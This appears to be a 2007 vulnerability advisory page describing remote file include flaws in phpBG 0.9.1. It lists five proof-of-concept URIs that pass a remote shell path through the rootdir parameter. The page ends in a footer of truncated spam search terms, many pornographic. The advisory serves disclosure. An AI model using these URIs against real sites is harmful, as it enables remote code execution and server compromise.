about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , phpBG rootdir Multiple Remote File Include Vulnerabilities


Title phpBG rootdir Multiple Remote File Include Vulnerabilities
Published 2007-08-30-12:00AM
Updated 2007-09-04-09:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  GoLd_M is credited with the discovery of these vulnerabilities.
Vulnerable  phpBG phpBG 0.9.1
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/intern/admin/other/backup.php?admin=1&rootdir=Shell
http://www.example.com/intern/admin/?rootdir=Shell
http://www.example.com/intern/clan/member_add.php?rootdir=Shell
http://www.example.com/intern/config/key_2.php?rootdir=Shell
http://www.example.com/intern/config/forum.php?rootdir=Shell
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 10 Dec 2009 06:41:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c /search/ex Soma Sexitv Luar neger port list PHP+Advanc Schmied ha Sexincity. www.ptcwz. Wap4sex.co xxxmovis news for c Seximagens remote win news for c news for c /search/ex Sex+pic+ga Boobs.Com smarty.php Apache/ Sexi muve news for c mambo Remo Www. sex f xxxhot Sexi gurls search/exp www.520zyc Pornostar POWERED BY Sexi vedi www.14-gir rpc exploi /search/ex guestbook Elite Foru ttt.bin7.c ://www.sex Sexfegurs schoolsex. sexe gross indiaboobs news for c japanisexy Www.Xxl .C personal-a www.secx.x Www.erotic